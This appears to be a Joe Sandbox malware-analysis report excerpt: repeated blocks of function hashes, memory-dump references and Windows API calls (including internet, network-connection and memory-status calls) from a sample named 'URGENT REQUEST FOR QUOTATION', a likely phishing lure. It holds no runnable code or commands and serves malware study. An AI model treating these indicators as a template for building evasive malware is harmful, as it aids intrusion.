                                                                                                                      • Opcode ID: 92bffd25cada180dfc80503b1cad5ecdeb26fcc0c38be2f68db60df31f79bf83
                                                                                                                      • Instruction ID: f9f4f9b2c316d5adea1ad48d965a44bd4c3b94c5a0390887efcb700ccdfcb717
                                                                                                                      • Opcode Fuzzy Hash: 92bffd25cada180dfc80503b1cad5ecdeb26fcc0c38be2f68db60df31f79bf83
                                                                                                                      • Instruction Fuzzy Hash: FAE08671A01211EBFB601FA0ED0DF863BBDBF44791F184808F249C9090D63C8441C750
                                                                                                                      APIs
                                                                                                                      • GetDesktopWindow.USER32 ref: 0008D858
                                                                                                                      • GetDC.USER32(00000000), ref: 0008D862
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0008D882
                                                                                                                      • ReleaseDC.USER32(?), ref: 0008D8A3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2889604237-0
                                                                                                                      • Opcode ID: 7acbd3852a6e8d0ae55c1992e12acd7c78773303d435d541c6464406644b24fe
                                                                                                                      • Instruction ID: 93eb2f004d95c300522832b60da4934074bc92019325bb445303f0b25f063cb2
                                                                                                                      • Opcode Fuzzy Hash: 7acbd3852a6e8d0ae55c1992e12acd7c78773303d435d541c6464406644b24fe
                                                                                                                      • Instruction Fuzzy Hash: F2E09AB5800205DFEB51AFA0D90CE6DBBB5FB08311F248459E84AE7260CB399942AF50
                                                                                                                      APIs
                                                                                                                      • GetDesktopWindow.USER32 ref: 0008D86C
                                                                                                                      • GetDC.USER32(00000000), ref: 0008D876
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0008D882
                                                                                                                      • ReleaseDC.USER32(?), ref: 0008D8A3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2889604237-0
                                                                                                                      • Opcode ID: 0e01f8c79d87e93cd922b491f9152c1281dc116c046972283da04278664986ed
                                                                                                                      • Instruction ID: 7f89e5ccc6f84e7aff5e8c485d32a4bac17aa66a8d4e455243f01fce0c072ed1
                                                                                                                      • Opcode Fuzzy Hash: 0e01f8c79d87e93cd922b491f9152c1281dc116c046972283da04278664986ed
                                                                                                                      • Instruction Fuzzy Hash: 47E092B5800204EFEB51AFA0D90CE6DBBB5BB08311F248459E94AE7260CB3D9902AF50
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00037620: _wcslen.LIBCMT ref: 00037625
                                                                                                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 000A4ED4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Connection_wcslen
                                                                                                                      • String ID: *$LPT
                                                                                                                      • API String ID: 1725874428-3443410124
                                                                                                                      • Opcode ID: 00e769f07bed419b523907f4d318997addd3eb83751a75462cd765baeacd5c5e
                                                                                                                      • Instruction ID: bda04ad2adaa8a4db1bee56266379e7962aebe204c873e3c2453f69d09d2b567
                                                                                                                      • Opcode Fuzzy Hash: 00e769f07bed419b523907f4d318997addd3eb83751a75462cd765baeacd5c5e
                                                                                                                      • Instruction Fuzzy Hash: 17917279900204DFCB55DF94C484EAABBF5BF85304F1580A9E40A9F362C775ED85CB50
                                                                                                                      APIs
                                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 0005E30D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorHandling__start
                                                                                                                      • String ID: pow
                                                                                                                      • API String ID: 3213639722-2276729525
                                                                                                                      • Opcode ID: 08672c7efe3c13eddd3d3defab04b61c502420c0e2f9849dcbc95a449556b43c
                                                                                                                      • Instruction ID: aa14851e9872179f7e8414ba1838c67fa90badc1f0b4531e9fc3a1a3de79ea78
                                                                                                                      • Opcode Fuzzy Hash: 08672c7efe3c13eddd3d3defab04b61c502420c0e2f9849dcbc95a449556b43c
                                                                                                                      • Instruction Fuzzy Hash: CB519D61A0C20196DB297714CD053BF3BE5EF10746F304DA9E8DA422E9EB358ECD9A42
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #
                                                                                                                      • API String ID: 0-1885708031
                                                                                                                      • Opcode ID: 8139a65d16e59c826f17e254fc02708281e0847ba5afd8c6c03596315724ccf1
                                                                                                                      • Instruction ID: 4b426c0fa4738efaa44134e813aed1a59e08195f93fee0c81e9baf77680401ba
                                                                                                                      • Opcode Fuzzy Hash: 8139a65d16e59c826f17e254fc02708281e0847ba5afd8c6c03596315724ccf1
                                                                                                                      • Instruction Fuzzy Hash: F25133B5608286DFDB65EF28C481AFE7BE8FF15310F248065EC919B2D1DA749D42CB90
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNEL32(00000000), ref: 0004F2A2
                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 0004F2BB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: GlobalMemorySleepStatus
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 2783356886-2766056989
                                                                                                                      • Opcode ID: 8269c56087a6ef3750c93927d71eb02a90f125cfb3a0e235db23b44436002628
                                                                                                                      • Instruction ID: d40da941cd1fa1931a34502283d656a13007f71f25524e8682d1c4fea429c9a7
                                                                                                                      • Opcode Fuzzy Hash: 8269c56087a6ef3750c93927d71eb02a90f125cfb3a0e235db23b44436002628
                                                                                                                      • Instruction Fuzzy Hash: 5A5127715087489BE321AF10D886BAFBBFCFB84700F81885DF1D991196EB718529CB66
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 000B57E0
                                                                                                                      • _wcslen.LIBCMT ref: 000B57EC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpper_wcslen
                                                                                                                      • String ID: CALLARGARRAY
                                                                                                                      • API String ID: 157775604-1150593374
                                                                                                                      • Opcode ID: 5127dc4024c3c17480dcee1aa78059c466f134ba3681b38b013bf83767a3818d
                                                                                                                      • Instruction ID: b9ee05086f92897da7b830e2bf3258059170e5dec463b456a873347ff041998c
                                                                                                                      • Opcode Fuzzy Hash: 5127dc4024c3c17480dcee1aa78059c466f134ba3681b38b013bf83767a3818d
                                                                                                                      • Instruction Fuzzy Hash: 1941A071A001099FCB14DFA9C881AFEBBF5FF59321F244069E505B7252EB749D81CB90
                                                                                                                      APIs
                                                                                                                      • _wcslen.LIBCMT ref: 000AD130
                                                                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 000AD13A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CrackInternet_wcslen
                                                                                                                      • String ID: |
                                                                                                                      • API String ID: 596671847-2343686810
                                                                                                                      • Opcode ID: 123e5246756b3849bbc5950884a6a3f513d05a1794bb89be304ec93c51ce6dfc
                                                                                                                      • Instruction ID: 7af26448b20abec4088fb160bd28366b322b9231e43e54f01ee38be369d513f9
                                                                                                                      • Opcode Fuzzy Hash: 123e5246756b3849bbc5950884a6a3f513d05a1794bb89be304ec93c51ce6dfc
                                                                                                                      • Instruction Fuzzy Hash: CF310C71D00219BBDF15EFA4CC85AEEBFB9FF09300F10401AF815A6166DB35AA56DB60
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 000C3621
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 000C365C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$DestroyMove
                                                                                                                      • String ID: static
                                                                                                                      • API String ID: 2139405536-2160076837
                                                                                                                      • Opcode ID: 74a351dec60ecab7d35708ac01a72d28cb9bf3ce22681deb245fca671bc73261
                                                                                                                      • Instruction ID: 83b8ac3532a5aeb1a8681e877b2491e899eb91538e3007cb62ea7d52bc67b449
                                                                                                                      • Opcode Fuzzy Hash: 74a351dec60ecab7d35708ac01a72d28cb9bf3ce22681deb245fca671bc73261
                                                                                                                      • Instruction Fuzzy Hash: D8318C71110604AAEB149F68DC81FFF73A9FF88720F00D61DF9A997291DA35AD81DB60
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 000C461F
                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 000C4634
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: '
                                                                                                                      • API String ID: 3850602802-1997036262
                                                                                                                      • Opcode ID: 3904fc2bef018e9d625f99ce4bb5e02bfe502ca91d69fcbab060cd7660199096
                                                                                                                      • Instruction ID: fcd3c15875c043c34de3c0f0383feaec0971e2052c851aba169da72c3d1f6a4f
                                                                                                                      • Opcode Fuzzy Hash: 3904fc2bef018e9d625f99ce4bb5e02bfe502ca91d69fcbab060cd7660199096
                                                                                                                      • Instruction Fuzzy Hash: 59311774A006099FDB14CFA9C990FDE7BB5FB09300F10406AE904AB342D771A941CF90
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 000C327C
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000C3287
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: Combobox
                                                                                                                      • API String ID: 3850602802-2096851135
                                                                                                                      • Opcode ID: 31b02444ded581ba7830288edb353368667840e42cda744f7838bc0c4d184a92
                                                                                                                      • Instruction ID: a85c1a73ac304b909e9760f2f58543f69bfc76a09c1a887cb7401dc2f09577ae
                                                                                                                      • Opcode Fuzzy Hash: 31b02444ded581ba7830288edb353368667840e42cda744f7838bc0c4d184a92
                                                                                                                      • Instruction Fuzzy Hash: 7111D0712102087FFF659F54DC81FBF37AEEB98364F108129F91897290D6719D518760
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0003600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0003604C
                                                                                                                        • Part of subcall function 0003600E: GetStockObject.GDI32(00000011), ref: 00036060
                                                                                                                        • Part of subcall function 0003600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0003606A
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 000C377A
                                                                                                                      • GetSysColor.USER32(00000012), ref: 000C3794
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                      • String ID: static
                                                                                                                      • API String ID: 1983116058-2160076837
                                                                                                                      • Opcode ID: abf9131f3e0fdff12ca912671cab7f62f7493b354140f546fb089c2a54c6bec4
                                                                                                                      • Instruction ID: 0296f7399c0d75493d78f497b1b87ac7fbf57e18e6f41e88972dea700155053f
                                                                                                                      • Opcode Fuzzy Hash: abf9131f3e0fdff12ca912671cab7f62f7493b354140f546fb089c2a54c6bec4
                                                                                                                      • Instruction Fuzzy Hash: CA1129B2610209AFEB11DFA8CC46EEE7BF8FB08314F008619F955E2250D775E9519B50
                                                                                                                      APIs
                                                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 000ACD7D
                                                                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 000ACDA6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$OpenOption
                                                                                                                      • String ID: <local>
                                                                                                                      • API String ID: 942729171-4266983199
                                                                                                                      • Opcode ID: 3c6e2a43c4da2c98a335d7adbe14452d02315600fb119ef7060be55b7f53b71c
                                                                                                                      • Instruction ID: edfb406784d3fe2f34ed96261c8450776eb7f4704b909bee274fd1c073034463
                                                                                                                      • Opcode Fuzzy Hash: 3c6e2a43c4da2c98a335d7adbe14452d02315600fb119ef7060be55b7f53b71c
                                                                                                                      • Instruction Fuzzy Hash: 0911CE71205636BAF7784BA68C89EF7BEACEF137A4F01422AB11987180D7749840D6F0
                                                                                                                      APIs
                                                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 000C34AB
                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 000C34BA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LengthMessageSendTextWindow
                                                                                                                      • String ID: edit
                                                                                                                      • API String ID: 2978978980-2167791130
                                                                                                                      • Opcode ID: b124ab85a0b504ac2a505de6131e22bff64f8b94b9f9b86f5125f791e2522308
                                                                                                                      • Instruction ID: 4f606b4f0fcfeba1c65d37d6421f22c3a8b3ee7adb547bda80beec2eae3dd946
                                                                                                                      • Opcode Fuzzy Hash: b124ab85a0b504ac2a505de6131e22bff64f8b94b9f9b86f5125f791e2522308
                                                                                                                      • Instruction Fuzzy Hash: B211BC71110208ABEB668F64DC84FEF37AAEB05374F508328FA64931E0C775EC919B60
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                                                      • CharUpperBuffW.USER32(?,?,?), ref: 00096CB6
                                                                                                                      • _wcslen.LIBCMT ref: 00096CC2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                                                      • String ID: STOP
                                                                                                                      • API String ID: 1256254125-2411985666
                                                                                                                      • Opcode ID: cb8520b366c12a258a82c67bf6702232887adf891d39e78ad60f57f7b981a6fa
                                                                                                                      • Instruction ID: 3b27576b14f78e0f7ea44391f1608fb3c9943448e4be2b3b7cbb4f61e83f0724
                                                                                                                      • Opcode Fuzzy Hash: cb8520b366c12a258a82c67bf6702232887adf891d39e78ad60f57f7b981a6fa
                                                                                                                      • Instruction Fuzzy Hash: 5701C032A145268ACF21AFBDDC819BF77E9EB61710B510538F86296191EA32E940E650
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                                                        • Part of subcall function 00093CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00093CCA
                                                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00091D4C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                      • Opcode ID: b54b4674ff9842b71137c659074186f7a0e00a3a0a6b018ff7e773a3cf0424a8
                                                                                                                      • Instruction ID: c5d131cb4e1bd06b404a3620ea32c8502a6d0760f134e6c88d4b5b614eeca96a
                                                                                                                      • Opcode Fuzzy Hash: b54b4674ff9842b71137c659074186f7a0e00a3a0a6b018ff7e773a3cf0424a8
                                                                                                                      • Instruction Fuzzy Hash: E901D471702219AB8F19EBA4CD55CFE77A8EF46390F040619F922672D2EA705908E760
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                                                        • Part of subcall function 00093CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00093CCA
